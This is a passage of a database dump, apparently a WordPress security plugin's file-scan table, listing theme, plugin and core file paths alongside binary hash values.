','v�v��<r��!��<yOo�����S����','',0,'?'),('�I=bh�ʔGIkoba','wp-content/plugins/all-in-one-wp-security-and-firewall/wp-security-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N_=r��V�oAՌB�','�u��$�\n\r�K���S��-�w/?_��#K','',0,'?'),('�\'fp��g.�`\"=ݜx','wp-content/themes/spidermag/assets/library/html5shiv/html5shiv.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ިUPb��t�<','�R�y1N�hu�¿���I}��؞���)i','',0,'?'),('�1�1]PC��g4�FU=','wp-content/plugins/wordfence/js/jquery.colorbox.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(O�0%6�9�e�3�j','{�L�#�\r��]�\ngL8P,���@��Ir,{ �','',0,'?'),('�>̫<�@~{�`�X','wp-content/themes/spidermag/assets/library/animate/css/animate.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M�����&U�/U�$\'','f��KPW��F�h����� ���1,\nZjb�','',0,'?'),('�L���B�B�V^��','wp-content/themes/gambit/template-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�XF )M�,��vK�*','l<ٳg�N %-�Q|��r��i�P#T�S��؝g','',0,'?'),('�h/͔��j�C�\0�n','wp-admin/includes/class-plugin-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�pT�0$�����.�','?�t�D~#͘��/X�#G/���Nf\\��͜gN','',0,'?'),('�j4j�-<R%PT�}�','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-editor-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s s������','=,do �`F�Tl���a�Ԋ �,�B��','',0,'?'),('�t�7�_�HP�S�\Z','wp-content/themes/auberge/documentation/css/custom.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�wy�%2��Z,%*�5�','���f���!��k����Ы�-�~�x���:','',0,'?'),('�x�W���2e�uv�L','wp-includes/customize/class-wp-customize-background-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{f�&��E\\$�sX�','R�v3����~������|.O�L�t�N`Ѯ��','',0,'?'),('�6���?�^o�#�','wp-includes/sodium_compat/namespaced/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r-�e��r^�!�~','��`��R�lԥLz�?i�āACH�Py�n','',0,'?'),('���R �(�, !)�Z','wp-content/plugins/wordfence/waf/pomo/mo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��6��~.���S�[','��\\\'�_F�u�C)CR\"(C�O�YW�!��)','',0,'?'),('��_@���#Y\r�g�.�','wp-content/themes/showcase-lite/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u�T�Z��L��n%.�',' �}b�rj���ͽ7�%o�b I��\0�j�','',0,'?'),('��K}{X��UG9<p�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/media-text/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�>�ᠼU��/G�@','��oyJ(B��f2H\'�h�!�\'* ɹ*��','',0,'?'),('�������݈3�+P\r','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Country.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����,0��Z%���','�g^�M���9=&*�M{��Xb�0*�u���','',0,'?'),('��,�wg�D9��L��t','wp-content/themes/promote/inc/admin/welcome-screen/welcome-screen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Fܳ�����K*n�','\'��B����2Ƃ�_�: ���L����#�','',0,'?'),('�����&@p����ɗ','wp-includes/js/dist/wordcount.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��.v��d�Y��','R�Ŧ2{/�<fo\0t�|Og�7���L!����','',0,'?'),('���ΦHc�^����)','wp-content/plugins/wordfence/views/scanner/issue-control-edit-user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������\'�{=ͺ','���R������_f�W{*3����ݔ �\"�/�','',0,'?'),('���0f|{�km�@��Y','wp-includes/wp-includes/images/media/video.png',0,'����u�h����q��','����u�h����q��','DBU����MiO�b�,���e��=��W�{���','',0,'?'),('���?#o��v��','wp-includes/wp-includes/images/down_arrow-2x.gif',0,'�]����M�����f�','�]����M�����f�','��w\0����qp�q�5���T�#�\\����','',0,'?'),('��k�Č�}�����','wp-content/themes/showcase-lite/screenshot.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ȓ���^QX�z','A]�j���8�Pn��Ù������X��R�','',0,'?'),('��G.H0:u���DB_�(','wp-content/themes/showcase-lite/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s����h�k�悲�','q�J��b��i�Di�߹���$�i;��i�c�}ϊ','',0,'?'),('���v�t����c^��','wp-content/themes/weblog/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0��g t�SV,�','H��v��@���i��g!&��:F�)<��� /','',0,'?'),('��5׳�|���~�^z','wp-content/themes/kidzoo-lite/sass/base/_variables.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j~���\r=����_�/�','��Q�ε*\\q��TXҌ�`s��1�3�Rg�','',0,'?'),('���j���f\'��/4�$','wp-content/themes/Kent/no-results.php',0,';+nZ�f�pԐ�QD8',';+nZ�f�pԐ�QD8','�����H����Е9�sC ��7M�u}0IEDdͻ','',0,'?'),('������sp���e�','wp-admin/includes/class-wp-ms-sites-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[II�[�I#i��','<�C~��-.�\0��9q�\\��}�)���~�[$','',0,'?'),('��j��l��&4�~��','wp-content/themes/newsmag/front-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2��Z\"h�����\nB�','�{� \\V{���\\���w�v��ڿ4�/|l���','',0,'?'),('�� �ӭgȱ!n�P�','wp-includes/IXR/class-IXR-client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a���J�}��!�W��','Yw��1��v.�G3e�d��Ä��y`LR ]','',0,'?'),('�H�/��5���̺','wp-content/themes/showcase-lite/css/ie8.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A�}�Z:�\n����|�','e9u��V�|��e��[���U�V�&>\Z4�r��:','',0,'?'),('�#���N�d\'(��\\��\0','wp-content/themes/advance/inc/kirki/assets/js/controls/select.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+4��C� A233)P�','˄ ��,���A�Ć\0?�l�س��&�C4�','',0,'?'),('�%c�}�O�(�?R�Y<','wp-content/themes/hueman/assets/czr/css/customizer-czr-content-picker.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lL���i�>���?','�g:��r�9��*V�_�wePm����)n�DCL��','',0,'?'),('�(������]dJ\rl','wp-content/plugins/wp-cerber/cerber-addons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǜ�9Twu*�Ҳ�i','��v� %Kj���\\J��/��՝mRb��X','',0,'?'),('�-1�8�;�T�/X�]','wp-admin/ms-sites.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f3����&S��7F76�','���,�$�y�n)R��Hg���h{�$��U��','',0,'?'),('�5�+�QW�C�!��j�T','wp-includes/wp-includes/rss-functions.php',0,' xr�6�2�\'�]�e�l#',' xr�6�2�\'�]�e�l#','�~^Ɏf}n���Bh��i=F�\n� ��^�,','',0,'?'),('�=��J��o ݣV`','wp-content/themes/sg-window/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^��:��(v�s[,�','^R�ec�H�u������[�L�Lט�./�9�','',0,'?'),('�B9g�M\Z�fKUh��Z�','wp-includes/wp-includes/js/swfupload/handlers.min.js',0,'j��ڙK�~q ����c=','j��ڙK�~q ����c=','�T�d�T�y~#��jI\"�+�+3�ɉ','',0,'?'),('�K���4�7\'�Rh?�','wp-content/themes/twentytwenty/readme.txt',0,'��Baĸ�Y��~ϟ��','��Baĸ�Y��~ϟ��','\\װ��c_AX�C�^���`\\{\Z,�t','',0,'?'),('�Su�c~�@���5�','wp-content/themes/capacious/template-parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|\r>����<����Z�','ħ���A��Q�Xe)�T���o.���V�','',0,'?'),('�j�<M�Dd����4m�','wp-admin/includes/ms-admin-filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;�Ƽz�g�L���','��t�Mp���Q�8=��~bw����/���','',0,'?'),('��b6���Rjs��!��','wp-includes/wp-includes/sodium_compat/namespaced/File.php',0,']�m�w�/�\\�y5�',']�m�w�/�\\�y5�','�ɐt�d7�H�}=��.t��Cw$�`c��\'�','',0,'?'),('��Q�&}\'4���5�6�','wp-content/themes/promote/inc/kirki/assets/scss/controls/toggle.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�fН\r�5��K.:�','t�9��\r�e�1��m�4עx�kG��Z����','',0,'?'),('����SSq�\r��F�\'','wp-includes/wp-includes/css/dashicons.css',0,',J��/��n�R�~�',',J��/��n�R�~�','qԡ���c��q�l5/�3$˝T�GW�','',0,'?'),('�����G���;9C','wp-includes/wp-includes/sodium_compat/src/Core/Base64/Original.php',0,'ң-���с��','ң-���с��','�9\0zot�ID:\0����g� I%�~ަ��$o','',0,'?'),('�Ρ~�ߓ�:����eo','wp-content/plugins/wordfence/images/icons/tick128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ğ��c�h4\"���','����V��}X e~G[C�峆��5������','',0,'?'),('��\n)۞,�\\�/�r','wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php',0,'�+o~��X��ݓ\0�','�+o~��X��ݓ\0�','xX��ѹ�$6�UdZ$����x�����&3�','',0,'?'),('�����(觨:pR�/','wp-includes/class-walker-nav-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S��|8���~Rx�4','�P�6��^��9�hQ=�Ʉ�����A��X��','',0,'?'),('��J�$R��_���o�','wp-content/plugins/wp-cerber/assets/flags/lk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m ���t�����','vl�a��tb�N���u�G�:���<?�7�=','',0,'?'),('��(5�aH�yo,X�','wp-includes/js/jquery/ui/tabs.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a`|��^(=`��hv','L�.X_ �DJ��tk��H��!|��ݔJ��x','',0,'?'),('� ������opF0','wp-content/themes/cactus/assets/plugins/font-awesome/css/font-awesome.css.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�d,�-�A2&b��j','f�w^s�*���[�Z,mB��������L#/','',0,'?'),('�/7�ñ�cx��p��g','wp-content/plugins/wordfence/views/onboarding/fresh-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�c��D���o� ','|�!��^(��^�~���c��m\Z/^f�[','',0,'?'),('���ڥ�^i�$��&','wp-content/plugins/wordfence/lib/wfCredentialsController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z��\0����իw6�','7�6��ay��5�?}%.]����؞u���S�','',0,'?'),('�Ǹ�\rk��3w�\'���','wp-content/themes/advance/css/customcss/sticky_menu.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S1���p��x�|�','����!Yj=\'��Q��b�Y&{����}�-�v','',0,'?'),('� ��:�{�wL�','wp-includes/wp-includes/js/dist/data-controls.js',0,'����:�ԕw$ބ�j','����:�ԕw$ބ�j','�a���95�]��ꐺW�e+,�O��� &�u','',0,'?'),('�$�͓�bHn��,\0-','wp-includes/images/smilies/icon_confused.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/# �Ӣww$x꾓Y','U0�\\L�X��fXƦ�G\0�T���$a�5U�B�','',0,'?'),('�-��췓��9�ExZ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xw���Tg���A}�\n','�k�cQx�e�˳`=n6�X5y��dz5u]WB\'','',0,'?'),('�N��ZND��N�>Y ','wp-includes/js/dist/components.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ҳx���a��WS�G','��Z( `#�=+BK�����5��\n�YCF�','',0,'?'),('�X�����\0J�@�+','wp-content/themes/maxbusiness/js/bootstrap.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ŵ���f�#!��N1','僉k�Y�(�O(��N\'=X֘�B��x5�','',0,'?'),('�X�2��YƗ߬���','wp-content/themes/vision-lite/css/theme-responsive.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Zb8���0�1\Z���','���զ\n��\Z*�F�V�Y-�pK��bx�[]��','',0,'?'),('�`�β$I}�>��_=','wp-content/themes/advance/inc/kirki/assets/js/controls/sortable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�R�1BV�d�a#�Q�','��uH�VD��8���I1��N\"Ll�R�����','',0,'?'),('�{4�.������#�#','wp-content/plugins/wordfence/modules/login-security/classes/controller/support.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��ʆ�wq��F��','R� j[�8ح�W����E�H��̅�a��I','',0,'?'),('��y�#+Y��G���','wp-content/themes/Yegor/inc/carousal.php',0,'F�_/$]�%�be��C?�','F�_/$]�%�be��C?�','~r$v��)�l�$�%ҿ2���Z�%HJGcTU','',0,'?'),('���2��Òe���[y','wp-content/themes/gambit/css/genericons/genericons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P\r�6��Xw��x�M',')��@ �ѵv�P�4\\W*Y�\'�-c�|����','',0,'?'),('��tWB�{a�]�hE�','wp-content/themes/gambit/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���,p���!WA��','��7�,eݵe��@�Z��hE��I�rr8','',0,'?'),('����t� I<͘l�] ','wp-content/themes/hueman/functions/czr/sections/class-widgets-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n[$���LlP�_��EЂ','��5\\\"�c�߾�5�l�9<�V{�,^w�E�','',0,'?'),('��뻛Ib�,6�Y+�8:','wp-content/themes/twentynineteen/sass/typography/_copy.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n�L�ر^��#*��s','+�\\��`F���~���)?���9G�}B1��','',0,'?'),('��v\'j@�-��*','wp-includes/widgets/class-wp-widget-media-gallery.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7_^\\fS�ɉ�]6n#\Z','>�@ΡD���&���{�(���Dγ����i�O#','',0,'?'),('��c\Z%$Y�~���-%�','wp-content/themes/skt-pathway/category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�5�>\r��r�-Dg��','��f��i��Օ~��I�����8|�K�#����','',0,'?'),('��\Z�h���S�C�Fp','wp-content/themes/advance/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+&L�#���|��','�7�b6���H}w7��x�/yl�ڹ��=�','',0,'?'),('����^�t�i�Gi��l','wp-includes/wp-includes/class-wp-text-diff-renderer-inline.php',0,'�8�l��_\r�u���','�8�l��_\r�u���','��פme�,��V����9�}���� y���v�','',0,'?'),('����!u�:�9��','wp-content/themes/advance/css/animate.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g7q��709\r�3','�;B�h(oaї��4��if�c����b�;�2','',0,'?'),('�\n]Eg���7Oq�b��','wp-includes/sitemaps/class-wp-sitemaps-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����G���o�\n�>','>��\0�B��[��Z��>�p�ޏ�a0~5k�[�G�','',0,'?'),('����n��j�P�+��','wp-admin/includes/class-custom-image-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ո�8��>�R�n�e',']1�9{k��P�f�6з�ɏj�WI� \n','',0,'?'),('�\':*�N机R�o','wp-content/themes/newsmag/assets/js/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8\Z��)\Z�Nb(c��6�','-���,]\Z�7���q�L�t����G��Χ','',0,'?'),('�^i�ؒ1�3���h)h','wp-content/themes/event/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������D���','�\\�g��z(����ߣZ�Cö�6����','',0,'?'),('��6Z�|e\\�A�','wp-content/themes/advance/images/slider.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Lk�.�֜b�ojO4�z','�}���v��\nK��ȹ��`z�w�*��p5u�','',0,'?'),('�\Z�������Bi/6�','wp-includes/js/jquery/ui/effect-clip.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']02[W�0V1�Q','�|�JR?�]ϭ̺\\T�v���� ��5t����$','',0,'?'),('�*���E��C� �|2','wp-includes/wp-includes/js/hoverIntent.js',0,'��z/P���ꮱ< �','��z/P���ꮱ< �','t��neTR/�77�@\Zҧ0�g�nj����','',0,'?'),('�?L�se��מd���\n','wp-content/themes/gambit/inc/slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�X-�O�� o���*','�%�h����]�,T��5�tq��/��','',0,'?'),('�L���yE�{��f�','wp-includes/css/dashicons.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','֍k����U�о�3�','|�38�9&ΚG�\"#��\0̠��;���e�R�','',0,'?'),('�R�C@�����4�I','wp-content/themes/sg-window/inc/js/customize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\nN|��\\���','�kᷕlA)�f?Rx��&���ڭ�FY�\n','',0,'?'),('�g�bf�\r\Z��ъ�','wp-includes/blocks/rss/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_Fɠm(��nJ��ZEG','�S�5��X��9������mOX�>s��l��','',0,'?'),('�j�\"t�� ��ӳl3','wp-content/themes/storeone/images/shop-slide1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','31�g�Eg�5T���Y�','b;S&���\r?�681]V�OM��u\Z��q','',0,'?'),('�k�UL��ǡ�$���','wp-admin/ms-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','³u~]�*C�u�\0�','e�s}k�_��q}���~G���[�5�Q�u�!�','',0,'?'),('�o/N���t$�$���|','wp-content/themes/twentytwentyone/assets/sass/05-blocks/code/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� ��RXjJw�E��','��O�V�P�K��Lѐ��(Е�#uu.�','',0,'?'),('�sO�>������','wp-content/themes/gambit/inc/customizer/functions/sanitize-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z������Gg�J','�\"Ǐg�L:��q�;�M`�K�q\\�l���c�','',0,'?'),('���b�/��\n����','wp-content/themes/pine/template-parts/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�fp�����,���','&O�O������#�&.��f� YG%�$�n7�','',0,'?'),('��=��-Xԍn{]�pf','wp-includes/js/wp-embed-template.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lq3UN�:�9�:^E��','3R�X�o��}Q��P��b�������J��','',0,'?'),('��we�i!<��s�y\n','wp-content/plugins/wordfence/views/scanner/issue-optionBadURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t��\"N��+�՛L�','�67�E0�܃�ՐC�{\\a�dPb�2�+�pW;P�','',0,'?'),('��$��D[�ֺ,�d��','wp-includes/wp-includes/js/tinymce/plugins/media/plugin.min.js',0,'6�\'1�Z����f ','6�\'1�Z����f ','\n�>����EQ�i�漺��k�}î�Dz������','',0,'?'),('�����w6Uu%��','wp-includes/js/dist/vendor/wp-polyfill-element-closest.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<j��� �<Yt�#�&','yNOBӻ�]&6�M�-��J��.�����:.�{','',0,'?'),('����S�D��~��p�v','wp-content/plugins/wp-cerber/assets/bn3ra.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�\n`ehG�����}�','Ul,��/��g����Qg�\'��� �I�&','',0,'?'),('���fSu�B�ͥ?^yO','wp-admin/css/themes.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d��y\Z�pK�3����`,','\\\r�$��D�Tl�b��ANĄH�\"ݷ����8','',0,'?'),('���8sKi�H��1�Y','wp-content/themes/spidermag/assets/js/custom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:�l�O�/f\0в���','c͐���;��hU�7ߋ&6�i]�Ѝ0L�Y�)','',0,'?'),('����{^��W����C�','wp-admin/css/colors/ocean/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~�Ss�li4��l1�','O[�~_uO�\r�i�e�s�^��ޘ���!��\nyK=','',0,'?'),('���� ��*Q��^','wp-content/themes/twentytwentyone/assets/sass/05-blocks/html/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��c\'[�g`.Ƿ{k','�{K��.(��\Z�\0����<��!rv�+=8���','',0,'?'),('���N��R�^�|%^O��','wp-content/themes/anima/admin/images/coffee.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N�)U6��','vq�u�eR�G?xd�d<�;\"��i�w�Qp�','',0,'?'),('��d8t�w��y�M��','wp-content/themes/pine/admin/js/pine-less.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�����qhF��','�Rnb�y��-�Z~]*̍�o�99\0DQ�K�','',0,'?'),('��3T,�M�� nÀ�4�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/video/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���@ۓb�����hX�','�ڊ�j�9�y���v\n�oC/�`��ny','',0,'?'),('��b��֏�� �$;�h','wp-content/themes/twentytwentyone/assets/sass/05-blocks/heading/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���D�Vr�|HH�','���Ҵ?5��n���P6ֆ�>�{\0-x��e','',0,'?'),('�� �L��wO�d98A�7','wp-includes/wp-includes/class-wp-session-tokens.php',0,'9]�K�UJW�*��h�=','9]�K�UJW�*��h�=','���4�\ZQuA^ء��j$M��0�\0','',0,'?'),('��{(pA��[=.�I�_','wp-content/themes/Kent/footer.php',0,'��3�n�GQ�#�V','��3�n�GQ�#�V','f�qI�d���l���j%! )3r܂O�˚�c','',0,'?'),('�߽s�h�>0�\n�+4q','wp-includes/wp-includes/js/dist/i18n.js',0,'\n|7�>&���~�','\n|7�>&���~�','�W\n��U,���5��m�_7�qv�L-�K��P%','',0,'?'),('��|���w�nG\Z','wp-content/themes/spidermag/assets/images/preloader/default.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q5f��k�L���\\�>','��J���X3\'�1�_I8]>6d�\Zi��\ns���','',0,'?'),('��$[��tCŤIw','wp-includes/sodium_compat/src/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W� ��,��~�r�','L>���e������h�\rF$�C�V������7�','',0,'?'),('�m5��u����1}�','wp-includes/css/dist/block-library/theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q��/���c�','�8�OG�I%��(�n6�)�lhf6f��','',0,'?'),('��ԩ[ij{�k���','wp-content/themes/kidzoo-lite/inc/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��cC��qo*x��','�8̶��%���3�M\nC�c��\Z41��','',0,'?'),('����>��6f�\n;�','wp-content/themes/advance/inc/kirki/includes/styles/class-kirki-styles-frontend.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�WY��Z���','�Sfu��!�G��gS+b��e�3�+���','',0,'?'),('��&B�5V�AUU,��','wp-includes/class-wp-http-cookie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`=Y=��3���p*���','�n�<o��%�/�U\"y�\"���)�����B�','',0,'?'),('�1A��bȱ��8��EN','wp-includes/blocks/group/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6qigV�+�\'�^�N�','�����Bi�B�\rv�\rM5���\n9\'�d��р9�','',0,'?'),('�@��3���1��Ô','wp-includes/wp-includes/customize/class-wp-customize-new-menu-section.php',0,'� �sL2/�B�����','� �sL2/�B�����','H\'�s�ӽ����I�$��Ӧ�ͤ�X�!�','',0,'?'),('�C��$�����KIg�M','wp-content/themes/hueman/assets/front/img/header/nyc-280.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','횹�HgI�b�$�]�','%�є#�.��r;-���}�\'�H��z֚W��G�','',0,'?'),('�KG�����=]�F\0','wp-includes/wp-includes/js/dist/wordcount.js',0,'�T/�mWeP�X<x�}�t','�T/�mWeP�X<x�}�t','��[:�{A�I��BY��C&���Op\'6�','',0,'?'),('�OҿD1�f��x�*�','wp-content/themes/spidermag/spidermag/customwidget/widget-banner-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����O���v��','̃�Baœ�Ź;��~�ó��.��7\'k朞�C �','',0,'?'),('�_f��;w�a��ځ�','wp-includes/js/tinymce/skins/wordpress/images/gallery.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_���Pw��PU�4','<W~���ض��+�hN��9��1�_�3�w�s','',0,'?'),('�g�ӨH7\ng��3L','wp-content/themes/twentytwenty/assets/js/customize-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ln��>�+�M��,','!�7U�`���^��:��8��o�_: � ','',0,'?'),('�u��<e�x��@ֈ>','wp-includes/js/underscore.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' >��>��S����b�%',' ʍ��LM> �ύ��5́kv��k�PHɇ0','',0,'?'),('�zub�d��3��_T�?','wp-content/plugins/wp-cerber/cerber-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A2?�f\\�~��1�D�','�+ ���+�6U��TRO�m�E�?<|�K�\nL','',0,'?'),('���])T�����N25F�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidRequestException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GR˗c��?qt�','֝Rz5B�,��nɲ�����\nHoڨ��|','',0,'?'),('��q?%�rp��0�7�q','wp-admin/css/colors/coffee/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!n�ΟӾ�)�X�','��aA=�M��X�绚����4#��A�iΡ\r���c','',0,'?'),('�����C� #a��S�[','wp-includes/sodium_compat/lib/stream-xchacha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\ZX�x�3)�','m�io�j�6XP�J��y��vx���ܧ','',0,'?'),('�����,/r�]��1S','wp-content/plugins/all-in-one-wp-security-and-firewall/logs/wp-security-log-cron-job.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('��>>Q���lh���','wp-includes/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css',0,'+\r��Π;K�۔�b/�','+\r��Π;K�۔�b/�','ߠ�P x�|�ΘQ=� ���Tc�vL\n*Ȱ','',0,'?'),('��P�Nj��醛G�;��','wp-content/themes/hueman/assets/front/img/thumb-standard-empty.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7����?G�\rǁ9/�','��x�M%_���>�ej\\Z�ϸ$�@-h�','',0,'?'),('�����v��.Hm','wp-content/themes/advance/inc/admin/img/fron-widgest.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�OZ���k�� F=+�','MШ �x=�@�7|��>�F�RW���\\B','',0,'?'),('��-[����S�_عQ�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/IpAddressNotFoundException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1:��!�G~�q�ic','^�DCguPT!>����W��\Z���k�~_5\n8','',0,'?'),('�Ғs]�u�\0�)mr\'','wp-content/themes/advance/inc/kirki/assets/scss/controls/checkbox.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ƭ9}��0�c2\r��r','Y^q³�V���M3A��~�v�sx+���Uݼ�','',0,'?'),('����XSg9h�','wp-content/themes/newsmag/inc/enqueues.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�埇���|�Ye�','5�H0i��Z4�)-�V�b�ˢ�.��G��','',0,'?'),('��;��K�P[�լ���','wp-content/themes/twentytwenty/assets/images/2020-three-quarters-2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u$���N����\r6','��Y0��hb_�%��/��_1�$Z�~xψ','',0,'?'),('��q